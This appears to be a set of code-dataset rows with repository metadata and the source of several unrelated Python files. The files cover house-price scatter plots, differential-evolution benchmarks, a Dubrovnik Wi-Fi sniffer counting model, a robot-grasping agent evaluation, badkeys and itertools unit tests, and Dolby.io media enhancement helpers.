] | null | null | null | eda/numerical_data/scatter_plot.py | kmsk99/data_science_toolbar | d139b83d4547b00249d35ba76da5c063c80f4bc2 | [
"MIT"
] | null | null | null | eda/numerical_data/scatter_plot.py | kmsk99/data_science_toolbar | d139b83d4547b00249d35ba76da5c063c80f4bc2 | [
"MIT"
] | null | null | null | fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(
nrows=3, ncols=2, figsize=(16, 13))
OverallQual_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['OverallQual']], axis=1)
sns.regplot(x='OverallQual', y='SalePrice',
data=OverallQual_scatter_plot, scatter=True, fit_reg=True, ax=ax1)
TotalBsmtSF_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['TotalBsmtSF']], axis=1)
sns.regplot(x='TotalBsmtSF', y='SalePrice',
data=TotalBsmtSF_scatter_plot, scatter=True, fit_reg=True, ax=ax2)
GrLivArea_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['GrLivArea']], axis=1)
sns.regplot(x='GrLivArea', y='SalePrice',
data=GrLivArea_scatter_plot, scatter=True, fit_reg=True, ax=ax3)
GarageCars_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['GarageCars']], axis=1)
sns.regplot(x='GarageCars', y='SalePrice',
data=GarageCars_scatter_plot, scatter=True, fit_reg=True, ax=ax4)
FullBath_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['FullBath']], axis=1)
sns.regplot(x='FullBath', y='SalePrice', data=FullBath_scatter_plot,
scatter=True, fit_reg=True, ax=ax5)
YearBuilt_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['YearBuilt']], axis=1)
sns.regplot(x='YearBuilt', y='SalePrice',
data=YearBuilt_scatter_plot, scatter=True, fit_reg=True, ax=ax6)
YearRemodAdd_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['YearRemodAdd']], axis=1)
YearRemodAdd_scatter_plot.plot.scatter('YearRemodAdd', 'SalePrice')
# Target Feature "SalePrice"와 가장 밀접한 연관이 있다고 판단됐던 변수들의 Scatter Plot을 그립니다.
# OverallQual, GarageCars, Fullbath와 같은 변수들은 실제로는 범주형 데이터의 특징을 보인다고 할 수 있습니다. (등급, 갯수 등을 의미하기 때문)
| 52.969697 | 97 | 0.712243 | 247 | 1,748 | 4.846154 | 0.275304 | 0.128655 | 0.076023 | 0.111111 | 0.496241 | 0.41604 | 0.41604 | 0.41604 | 0.245614 | 0 | 0 | 0.016469 | 0.131579 | 1,748 | 32 | 98 | 54.625 | 0.772069 | 0.09611 | 0 | 0 | 0 | 0 | 0.168675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d1ba48e81f62271e0ca0c8ffd41e85b578380d | 2,544 | py | Python | FIRST/DE/report.py | zdoryk/TSI | 22c9baf919ef85e1d1887a5978f81c0bff9651d6 | [
"MIT"
] | 1 | 2022-03-13T10:49:36.000Z | 2022-03-13T10:49:36.000Z | FIRST/DE/report.py | zdoryk/TSI | 22c9baf919ef85e1d1887a5978f81c0bff9651d6 | [
"MIT"
] | null | null | null | FIRST/DE/report.py | zdoryk/TSI | 22c9baf919ef85e1d1887a5978f81c0bff9651d6 | [
"MIT"
] | null | null | null | from fitness_functions import sphere, f2, rosenbrock, griewank, rastrigin, \
brown, schwefel, zakharov, schaffersf6, np
from matplotlib import pyplot as plt
from DEvolution import DEvolution
DIMENSIONS = 20
POPULATION = [30]
f = 0.6
cr = 0.6
PRESETS = {
'Sphere': {
'accuracy': 0.0001,
'min_x': [-100.0] * DIMENSIONS,
'max_x': [100.0] * DIMENSIONS,
'function': sphere,
},
'F2': {
'accuracy': 0.0001,
'min_x': [-100.0] * DIMENSIONS,
'max_x': [100.0] * DIMENSIONS,
'function': f2,
},
'Rosenbrock': {
'accuracy': 30,
'min_x': [-2.048] * DIMENSIONS,
'max_x': [2.048] * DIMENSIONS,
'function': rosenbrock,
},
'Griewank': {
'accuracy': 0.1,
'min_x': [-600.0] * DIMENSIONS,
'max_x': [600.0] * DIMENSIONS,
'function': griewank,
},
'Rastrigin': {
'accuracy': 30,
'min_x': [-5.12] * DIMENSIONS,
'max_x': [5.12] * DIMENSIONS,
'function': rastrigin,
},
}
ITERATIONS = 500
for pop in POPULATION:
for k, v in PRESETS.items():
L_G_best_fitness_iterations, U_G_best_fitness_iterations = [1000, 1000]
while L_G_best_fitness_iterations > v['accuracy'] or U_G_best_fitness_iterations > v['accuracy']:
L_G_best_fitness_iterations, linear_fitness_list = \
DEvolution(pop, v['min_x'], v['max_x'], v['function'], f=f, cr=cr).run_iterations(ITERATIONS, linear=True)
U_G_best_fitness_iterations, usual_fitness_list = \
DEvolution(pop, v['min_x'], v['max_x'], v['function'], f=f, cr=cr).run_iterations(ITERATIONS)
print(k, v['accuracy'])
print(f'Linear: {L_G_best_fitness_iterations}')
print(f'Usual: {U_G_best_fitness_iterations}')
fig, (ax1, ax2) = plt.subplots(2, 1, constrained_layout=True)
ax1.plot(np.arange(50, ITERATIONS), linear_fitness_list[51:])
ax1.set_title(f'Linear')
ax1.set_xlabel('Iterations')
ax1.set_ylabel('Best fitness value')
ax2.plot(np.arange(50, ITERATIONS), usual_fitness_list[51:])
ax2.set_title(f'Usual')
ax2.set_xlabel('Iterations')
ax2.set_ylabel('Best fitness value')
fig.suptitle(f'{k}', fontsize=16)
plt.savefig(f'plots/f_06_cr_06/{k}_{pop}-Line{L_G_best_fitness_iterations}-Usual{U_G_best_fitness_iterations}.png')
# plt.show()
# np.savetxt(f'results/{k}_PSO_RESULTS.csv', fitness_list, header=f'{k}', delimiter='\n')
| 33.473684 | 123 | 0.601808 | 331 | 2,544 | 4.386707 | 0.280967 | 0.090909 | 0.082645 | 0.151515 | 0.426309 | 0.258953 | 0.177686 | 0.177686 | 0.177686 | 0.177686 | 0 | 0.053479 | 0.242925 | 2,544 | 75 | 124 | 33.92 | 0.700415 | 0.038522 | 0 | 0.126984 | 0 | 0 | 0.191315 | 0.064318 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d3cb72310afffb5bc84f6294c780d65c04f286 | 11,232 | py | Python | python/model_dubrovnik.py | physycom/slides | ff73de94997e39673d6d5c82b1bb4d9d0069fee6 | [
"BSD-3-Clause"
] | 1 | 2020-05-29T09:40:19.000Z | 2020-05-29T09:40:19.000Z | python/model_dubrovnik.py | physycom/slides | ff73de94997e39673d6d5c82b1bb4d9d0069fee6 | [
"BSD-3-Clause"
] | null | null | null | python/model_dubrovnik.py | physycom/slides | ff73de94997e39673d6d5c82b1bb4d9d0069fee6 | [
"BSD-3-Clause"
] | 2 | 2022-01-27T08:53:19.000Z | 2022-03-28T07:14:56.000Z | #! /usr/bin/env python3
import os
import json
import argparse
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import json
from datetime import datetime, timedelta
import pymongo
import mysql.connector
from collections import defaultdict
##########################
#### log function ########
##########################
import logging
logger = logging.getLogger('mod_du')
#############################
#### model ferrara class ####
#############################
class model_dubrovnik():
def __init__(self, config):
self.logger = logger
self.cnt = pd.DataFrame()
self.date_format = '%Y-%m-%d %H:%M:%S'
self.time_format = '%H:%M:%S'
self.rates_dt = 15 * 60
self.config = config
self.station_map = {}
self.data = pd.DataFrame()
with open(os.path.join(os.environ['WORKSPACE'], 'slides', 'vars', 'extra', 'dubrovnik_router.json')) as sin:
self.st_info = json.load(sin)
st_ser2id = { st['serial'] : st['id'] for st in self.st_info }
self.station_map = config['station_mapping']
self.station_mapid = { k : [ st_ser2id[si] for si in v ] for k,v in self.station_map.items() }
self.source_map = { i : k for k,v in self.station_map.items() for i in v }
self.source_mapid = { i : k for k,v in self.station_mapid.items() for i in v }
def full_table(self, start, stop, tag, resampling=None):
start = pd.to_datetime(start).tz_localize('Europe/Rome').tz_convert('utc')
stop = pd.to_datetime(stop).tz_localize('Europe/Rome').tz_convert('utc')
if not tag in self.station_map:
raise Exception(f'Model DU tag {tag} not in sniffer-source map')
if not tag in self.cnt.columns:
data = self.count_raw(start, stop)
else:
data = self.cnt
if resampling != None and resampling < self.rates_dt:
dtot = data.sum()
data = data.resample(f'{resampling}s').interpolate(direction='both')
data = data * dtot / data.sum()
resampling_min = resampling // 60
start_date = start.replace(
minute=resampling_min*(start.minute//resampling_min),
second=0
)
stop_date = stop - timedelta(seconds=1)
stop_date = stop_date.replace(
minute=resampling_min*(stop_date.minute//resampling_min),
second=0
)
fullt = pd.date_range(start_date, stop_date, freq=f'{resampling}s' )
data = data.reindex(fullt).interpolate(direction='both')
data = data[ (data.index >= start) & (data.index < stop) ]
data = data.tz_convert('Europe/Rome').tz_localize(None)
self.cnt = self.cnt.drop(columns=tag)
return data[[tag]]
def count_raw(self, start, stop):
"""
Perform device id counting with fine temporal scale
"""
df = self.get_data(start, stop)
fine_freq = f'{self.rates_dt}s'
df['wday'] = [ t.strftime('%a') for t in df.index ]
df['date'] = df.index.date
df['time'] = df.index.time
df['source'] = df.station_id.apply(lambda x: self.source_mapid[x])
#print(df)
tnow = datetime.now()
cnts = pd.DataFrame(index=pd.date_range(start, stop, freq=fine_freq))
#cnts = cnts.tz_localize('Europe/Rome')
for station, dfg in df.groupby(['source']):
#print(station, len(dfg))
s = pd.Series(dfg['device_uid'], index=dfg.index)
dfu = pd.DataFrame(s.groupby(pd.Grouper(freq=fine_freq)).value_counts())
dfu.columns = [station]
dfu = dfu.reset_index()
dfu = dfu.set_index('date_time')
dfu = dfu.groupby('date_time')[['device_uid']].count()
dfu.columns = [station]
# print(dfu)
cnts[station] = np.nan
mrg = cnts[[station]]
# print(mrg)
mrg = pd.merge(mrg, dfu, left_index=True, right_index=True, how='left', suffixes=('_cnts', ''))
# print('merge\n', mrg)
cnts[station] = mrg[f'{station}']
# fix null/empty/nan/missing values
#cnts[ cnts == 0 ] = np.nan
#cnts = cnts.interpolate(limit=10000, limit_direction='both')
cnts = cnts.fillna(0)
cnts.index.name = 'time'
tcounting = datetime.now() - tnow
self.logger.debug(f'Counting done in {tcounting}')
#print(cnts)
self.cnt = cnts.astype(int)
return self.cnt
def get_data(self, start, stop):
try:
config = self.config['mysql']
db = mysql.connector.connect(
host = config['host'],
port = config['port'],
user = config['user'],
passwd = config['pwd'],
database = config['db']
)
cursor = db.cursor()
id_list = sum(self.station_mapid.values(), [])
start_utc = start.strftime(self.date_format)
stop_utc = stop.strftime(self.date_format)
query = f"""
SELECT
de.eventOccurredAt as date_time,
de.id_device as station_id,
de.eventClientiId as device_uid
FROM
DubrovnikPma.DevicesEvents de
WHERE
(de.eventOccurredAt >= '{start_utc}' AND de.eventOccurredAt < '{stop_utc}')
AND (de.id_device IN {tuple(id_list)} )
"""
#print(query)
tquery = datetime.now()
cursor.execute(query)
result = cursor.fetchall()
tquery = datetime.now() - tquery
self.logger.info(f'Received {len(result)} mysql data in {tquery}')
if len(result) == 0:
raise Exception(f'[mod_fe] Empty mysql query result')
df1 = pd.DataFrame(result)
df1.columns = cursor.column_names
df1.index = pd.to_datetime(df1.date_time)
df1 = df1.tz_localize('utc')
df = df1
return df
except Exception as e:
raise Exception(f'[mod_fe] Query failed : {e}')
def get_station_metadata(self):
# mysql
config = self.config['mysql']
db = mysql.connector.connect(
host = config['host'],
port = config['port'],
user = config['user'],
passwd = config['pwd'],
database = config['db']
)
cursor = db.cursor()
query = f"""
SELECT
ds.id as id,
ds.name as name,
ds.serial as serial,
ds.lat as lat,
ds.lng as lon,
ds.status as status
FROM
Devices ds
"""
#print(query)
tquery = datetime.now()
cursor.execute(query)
result = cursor.fetchall()
tquery = datetime.now() - tquery
self.logger.debug(f'Received {len(result)} mysql data in {tquery}')
if len(result) == 0:
raise Exception(f'[mod_fe] Empty mysql query result')
df1 = pd.DataFrame(result)
df1.columns = cursor.column_names
return df1
def map_station_to_source(self):
stations = pd.DataFrame.from_dict(self.st_info)
sourcemap = defaultdict(lambda: 'none')
sourcemap.update(self.source_mapid)
#stations = stations.set_index('serial').loc[ self.source_map.keys(), :].reset_index()
stations['source'] = stations.id.apply(lambda x: sourcemap[x])
stations['color'] = 'blue'
stations.loc[stations.source == 'none', 'color'] = 'red'
# stations['color'] = stations.serial.apply(lambda x: clustercol[clustermap[x]])
print(stations)
#stations = stations[stations.cluster != 'none']
map_center = stations[['lat', 'lon']].mean().values
simconf = os.path.join(os.environ['WORKSPACE'], 'slides', 'work_ws', 'output', 'wsconf_sim_dubrovnik.json')
with open(simconf) as sin:
sconf = json.load(sin)
sources = pd.DataFrame.from_dict(sconf['sources']).transpose().dropna(subset=['source_location'])
sources['name'] = sources.index.str.replace('_IN', '')
sources.index = sources['name']
sources['lat'] = sources.source_location.apply(lambda x: x['lat'])
sources['lon'] = sources.source_location.apply(lambda x: x['lon'])
sources['type'] = 'synth'
sources.loc[ self.station_map.keys() , 'type'] = 'data'
colors = { 'synth':'red', 'data':'blue'}
sources['color'] = sources.type.apply(lambda t: colors[t])
#sources[['lat', 'lon']] = sources.source_location.apply(lambda x: { 'lat':x['lat'], 'lon':x['lon'] })
sources = sources[['lat', 'lon', 'name', 'color']]
print(sources)
print(sources.columns)
import folium
m = folium.Map(location=map_center, control_scale=True, zoom_start=9)
stations.apply(lambda row: folium.CircleMarker(
location=[row.lat, row.lon],
radius=7,
fill_color=f'{row.color}',
color=f'{row.color}',
popup=folium.Popup(f'<p><b>STATION</b></br>id <b>{row.id}</b></br>serial <b>{row.serial}</b></br>source <b>{row.source}</b></p>', show=False, sticky=True),
).add_to(m), axis=1)
stations[ stations.source != 'none' ].apply(lambda row: folium.PolyLine(
locations=[
[ sources.loc[row.source, 'lat'], sources.loc[row.source, 'lon'] ],
[ row.lat, row.lon ]
],
color='black',
weight=2,
).add_to(m), axis=1)
sources.apply(lambda row: folium.CircleMarker(
location=[row.lat, row.lon],
radius=10,
fill_color=f'{row.color}',
color=f'{row.color}',
fill_opacity=1.0,
popup=folium.Popup(f'<p><b>SOURCE</b></br>id <b>{row.name}</b></p>', show=True, sticky=True),
).add_to(m), axis=1)
s, w = stations.loc[ stations.lon > 0, ['lat', 'lon']].min()
n, e = stations.loc[ stations.lon > 0, ['lat', 'lon']].max()
m.fit_bounds([ [s,w], [n,e] ])
m.save(f'map_sniffer2sources.html')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--cfg', help='config file', required=True)
args = parser.parse_args()
base = args.cfg
base = base[:base.rfind('.')]
with open(args.cfg) as f:
config = json.load(f)
mdu = model_dubrovnik(config)
if 0:
df = mdu.get_station_metadata()
dfj = json.loads(df.to_json(orient="records"))
with open('stations_geodata.json', 'w') as sout:
json.dump(dfj, sout, indent=2, ensure_ascii=False)
print(df)
map_center = df[['lat', 'lon']].mean().values
import folium
m = folium.Map(location=map_center, control_scale=True, zoom_start=9)
df.apply(lambda row: folium.CircleMarker(
location=[row.lat, row.lon],
radius=7,
fill_color='red',
color='red',
popup=folium.Popup(f'<p><b>SNIFFER</b></br>id <b>{row.id}</b></br>serial <b>{row.serial}</b></p>', show=False, sticky=True),
).add_to(m), axis=1)
s, w = df[['lat', 'lon']].min()
n, e = df[['lat', 'lon']].max()
m.fit_bounds([ [s,w], [n,e] ])
m.save(f'map_router.html')
start_date = '2021-01-22 00:00:00 CET'
stop_date = '2021-01-23 00:00:00 CET'
dt_fmt = '%Y-%m-%d %H:%M:%S %Z'
start = pd.to_datetime(start_date, format=dt_fmt).tz_localize(None)
stop = pd.to_datetime(stop_date, format=dt_fmt).tz_localize(None)
if 0:
data = mdu.get_data(start, stop)
print(data)
if 0:
cnt = mdu.count_raw(start, stop)
print(cnt)
if 0:
df = mdu.full_table(start, stop)
print(df)
w, h = 12, 10
fig, ax = plt.subplots(1, 1, figsize=(w, h))
plt.suptitle(f'Source timetables')
for cid in df.columns:
ax.plot(df.index, df[cid], '-', label=cid)
ax.set_title(f'period {start} -> {stop}')
ax.legend()
ax.grid()
ax.tick_params(labelrotation=45)
plt.savefig(f'source_timetables.png')
plt.close()
if 1:
mdu.map_station_to_source() | 32.938416 | 161 | 0.611289 | 1,568 | 11,232 | 4.271046 | 0.213648 | 0.018068 | 0.012543 | 0.011946 | 0.315962 | 0.270718 | 0.260415 | 0.208302 | 0.197253 | 0.185307 | 0 | 0.01008 | 0.213942 | 11,232 | 341 | 162 | 32.938416 | 0.748443 | 0.062055 | 0 | 0.266917 | 0 | 0.011278 | 0.178733 | 0.034513 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022556 | false | 0.007519 | 0.052632 | 0 | 0.093985 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d3de2cf6adf1448807a47eac86afeaf485db42 | 2,577 | py | Python | manipulation_main/utils.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 75 | 2020-10-24T06:32:55.000Z | 2022-03-26T07:44:49.000Z | manipulation_main/utils.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 12 | 2021-03-21T06:19:00.000Z | 2022-03-31T13:39:34.000Z | manipulation_main/utils.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 27 | 2020-12-30T12:49:46.000Z | 2022-03-17T16:10:02.000Z | import logging
import time
import numpy as np
from manipulation_main.gripperEnv.robot import RobotEnv
def run_agent(task, agent, stochastic=False, n_episodes=100, debug=False):
rewards = np.zeros(n_episodes)
steps = np.zeros(n_episodes)
success_rates = np.zeros(n_episodes)
timings = np.zeros(n_episodes)
# Vectorized env only needs reset in the beginning then it resets automatically
obs = task.reset()
for i in range(n_episodes):
# Run and time one rollout
start = time.process_time()
s, r, sr = _run_episode(obs, task, agent, stochastic) if not debug else _run_episode_debug(task, agent, stochastic)
end = time.process_time()
# Store the statistics
rewards[i] = np.sum(r)
steps[i] = s
success_rates[i] = sr
timings[i] = end - start
logging.info('Episode %d/%d completed in %ds, %d steps and return %f\n and success rate %d',
i+1, n_episodes, timings[i], steps[i], rewards[i], success_rates[i])
mean_reward = np.mean(rewards)
mean_steps = np.mean(steps)
mean_success_rate = np.mean(success_rates)
mean_time = np.mean(timings)
# Print the statistics
print('{:<13}{:>5.2f}'.format('Mean reward:', mean_reward))
print('{:<13}{:>5.2f}'.format('Mean steps:', mean_steps))
print('{:<13}{:>5.2f}'.format('Mean success rate:', mean_success_rate))
print('{:<13}{:>5.2f}'.format('Mean time:', mean_time))
return rewards, steps, success_rates, timings
def _run_episode_debug(task, agent, stochastic):
obs = task.reset()
done = False
while not done:
# logging.debug('Observation: %s', obs)
action = agent.act(obs, stochastic=stochastic)
obs, reward, done, _ = task.step(action)
position, _ = task.get_pose()
robot_height = position[2]
# logging.debug('Action: %s', action)
# logging.debug('Reward: %s\n', reward)
return task.episode_step, task.episode_rewards, task.status == task.Status.SUCCESS
def _run_episode(obs, task, agent, stochastic):
done = False
deterministic = not stochastic
while not done:
# logging.debug('Observation: %s', obs)
action = agent.predict(obs, deterministic=deterministic)
obs, reward, done, _ = task.step(action[0])
# logging.debug('Action: %s', action)
# logging.debug('Reward: %s\n', reward)
return task.buf_infos[0]["episode_step"], task.buf_infos[0]["episode_rewards"], task.buf_infos[0]["status"] == RobotEnv.Status.SUCCESS | 33.907895 | 138 | 0.642996 | 348 | 2,577 | 4.623563 | 0.264368 | 0.039155 | 0.059043 | 0.039776 | 0.325668 | 0.303294 | 0.137974 | 0.137974 | 0.137974 | 0.137974 | 0 | 0.01245 | 0.220799 | 2,577 | 76 | 138 | 33.907895 | 0.788845 | 0.142802 | 0 | 0.133333 | 0 | 0.022222 | 0.098226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.088889 | 0 | 0.222222 | 0.088889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d8853a7864dcc977309abcfdfe79184c98511f | 771 | py | Python | tests/test_ecbl.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | 9 | 2022-01-14T03:32:34.000Z | 2022-03-22T13:47:45.000Z | tests/test_ecbl.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | null | null | null | tests/test_ecbl.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | 1 | 2022-03-14T11:36:15.000Z | 2022-03-14T11:36:15.000Z | import unittest
import os
import badkeys
TDPATH = f"{os.path.dirname(__file__)}/data/"
class TestEcbl(unittest.TestCase):
def test_ecbl(self):
with open(f"{TDPATH}ec-p256-rfc-example.key") as f:
key = f.read()
r = badkeys.checkpubkey(key, checks=["blocklist"])
self.assertTrue("blocklist" in r["results"])
with open(f"{TDPATH}ed25519-rfc-example.key") as f:
key = f.read()
r = badkeys.checkpubkey(key, checks=["blocklist"])
self.assertTrue("blocklist" in r["results"])
with open(f"{TDPATH}x448-ok.key") as f:
key = f.read()
r = badkeys.checkpubkey(key, checks=["blocklist"])
self.assertFalse(r["results"])
if __name__ == "__main__":
unittest.main()
| 28.555556 | 59 | 0.607004 | 99 | 771 | 4.59596 | 0.40404 | 0.052747 | 0.059341 | 0.098901 | 0.6 | 0.6 | 0.6 | 0.6 | 0.6 | 0.6 | 0 | 0.018613 | 0.233463 | 771 | 26 | 60 | 29.653846 | 0.751269 | 0 | 0 | 0.4 | 0 | 0 | 0.243839 | 0.123217 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.05 | false | 0 | 0.15 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d89457739e1aae271292671fe5745bb6d4974c | 1,266 | py | Python | tests/test_itertools.py | star936/python-learning | 02fe35a3944cb75184f1c9196618202ccf02c210 | [
"MIT"
] | null | null | null | tests/test_itertools.py | star936/python-learning | 02fe35a3944cb75184f1c9196618202ccf02c210 | [
"MIT"
] | 2 | 2021-12-13T20:11:09.000Z | 2022-03-02T15:12:36.000Z | tests/test_itertools.py | star936/python-learning | 02fe35a3944cb75184f1c9196618202ccf02c210 | [
"MIT"
] | null | null | null | # coding: utf-8
from examples.itertools import grouper, group_bills_to_100, evens, odds, chain_repeat_slice
class TestIterTools(object):
def test_groper(self):
num = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
real = grouper(num, 4, fillvalue=None)
expected = [(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, None, None)]
assert list(real) == expected
def test_group_bills_to_100(self):
expected = {(20, 20, 10, 10, 10, 10, 10, 5, 1, 1, 1, 1, 1),
(20, 20, 10, 10, 10, 10, 10, 5, 5),
(20, 20, 20, 10, 10, 10, 5, 1, 1, 1, 1, 1),
(20, 20, 20, 10, 10, 10, 5, 5),
(20, 20, 20, 10, 10, 10, 10)}
real = group_bills_to_100()
assert set(real) == expected
def test_even(self):
expected = [0, 2, 4, 6, 8]
data = evens()
real = [next(data) for _ in range(5)]
assert real == expected
def test_odd(self):
expected = [1, 3, 5, 7, 9]
data = odds()
real = [next(data) for _ in range(5)]
assert real == expected
def test_chain_repeat_slice(self):
expected = ['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b']
real = chain_repeat_slice()
assert list(real) == expected
| 33.315789 | 91 | 0.5 | 191 | 1,266 | 3.198953 | 0.277487 | 0.0982 | 0.0982 | 0.065466 | 0.340426 | 0.327332 | 0.324059 | 0.320786 | 0.301146 | 0.301146 | 0 | 0.15119 | 0.336493 | 1,266 | 37 | 92 | 34.216216 | 0.57619 | 0.010269 | 0 | 0.206897 | 0 | 0 | 0.006395 | 0 | 0 | 0 | 0 | 0 | 0.172414 | 1 | 0.172414 | false | 0 | 0.034483 | 0 | 0.241379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cd19aead162f8c831f9edd1ff31b6b49e40ea79 | 3,860 | py | Python | utils.py | dolbyio-samples/blog-enhance-parameters-audio-quality | fd5764d7d1bb58b641eb607399d5b3f069bf365c | [
"CC0-1.0"
] | null | null | null | utils.py | dolbyio-samples/blog-enhance-parameters-audio-quality | fd5764d7d1bb58b641eb607399d5b3f069bf365c | [
"CC0-1.0"
] | null | null | null | utils.py | dolbyio-samples/blog-enhance-parameters-audio-quality | fd5764d7d1bb58b641eb607399d5b3f069bf365c | [
"CC0-1.0"
] | null | null | null | import time
import requests
import shutil
import os
import numpy as np
import matplotlib.pyplot as plt
import scipy.io.wavfile as wavfile
def download_file(file_url, headers, output_path):
args = {
"url": file_url,
}
url = "https://api.dolby.com/media/output"
# Create a request to download created file via DolbyIO Output API
with requests.get(url, params=args, headers=headers, stream=True) as response:
response.raise_for_status()
response.raw.decode_content = True
print("Downloading from {0} into {1}".format(response.url, output_path))
with open(output_path, "wb") as output_file:
shutil.copyfileobj(response.raw, output_file)
return output_path
def upload_input_file(local_file_path, input_base_path, headers):
filename = os.path.basename(local_file_path)
cloud_file_path = '{}/{}'.format(input_base_path, filename)
arguments = {
"url": cloud_file_path,
}
url = "https://api.dolby.com/media/input"
# Create a request to upload a file from local machine via DolbyIO Input API
response = requests.post(url, json=arguments, headers=headers)
response.raise_for_status()
data = response.json()
presigned_url = data["url"]
# Upload your media to the pre-signed url response
print("Uploading {0} to {1}".format(local_file_path, presigned_url))
with open(local_file_path, "rb") as input_file:
requests.put(presigned_url, data=input_file)
return cloud_file_path
def convert_mp4_to_wav(mp4_file):
# To use this function, you need to have ffmpeg installed on your computer
wave_file = mp4_file.replace('mp4', 'wav')
os.system('ffmpeg -i {} -ac 1 -f wav {}'.format(mp4_file, wave_file))
return wave_file
def plot_a_waveform_and_spectrum(wave_file, title=None):
# Create a figure object to make two plots
fig = plt.figure(1)
if title:
fig.suptitle(title)
# Plot a waveform of wav_file
plot_waveform = plt.subplot(211)
sample_rate, data = wavfile.read(wave_file)
duration = len(data) / sample_rate
time_data = np.linspace(0, duration, len(data))
plot_waveform.plot(time_data, data)
plot_waveform.set_xlabel('Time')
plot_waveform.set_ylabel('Amplitude')
ax = plt.gca()
ax.set_xlim([0, 5])
# Calculate and create a spectogram plot
plot_spectrogram = plt.subplot(212)
plot_spectrogram.specgram(data[:], Fs=sample_rate, NFFT=1024, noverlap=900)
plot_spectrogram.set_xlabel('Time')
plot_spectrogram.set_ylabel('Frequency')
ax = plt.gca()
ax.set_xlim([0, 5])
fig.tight_layout()
plt.savefig('{}.png'.format(wave_file))
plt.close()
def enhance_media(input, output, params, headers):
# Set Enhance API URL
url = "https://api.dolby.com/media/enhance"
body = {
"input": input,
"output": output
}
body.update(params)
response = requests.request("POST", url, json=body, headers=headers)
print('{} processed to: {}'.format(input, output))
print(response.text)
return output
def enhance_download_analyze(input_file, output_filename, output_file_base, output_local_file_base, enhance_params,
headers, title=None):
output_cloud_storage = '{}/{}'.format(output_file_base, output_filename)
output_local = '{}/{}'.format(output_local_file_base, output_filename)
# Enhance
enhance_media(input_file, output_cloud_storage, enhance_params, headers)
# Download produced file to your local machine
time.sleep(10)
downloaded_file = download_file(output_cloud_storage, headers, output_local)
print('Downloaded file: {}'.format(downloaded_file))
# utils.plot_a_waveform(downloaded_file)
wav_file = convert_mp4_to_wav(downloaded_file)
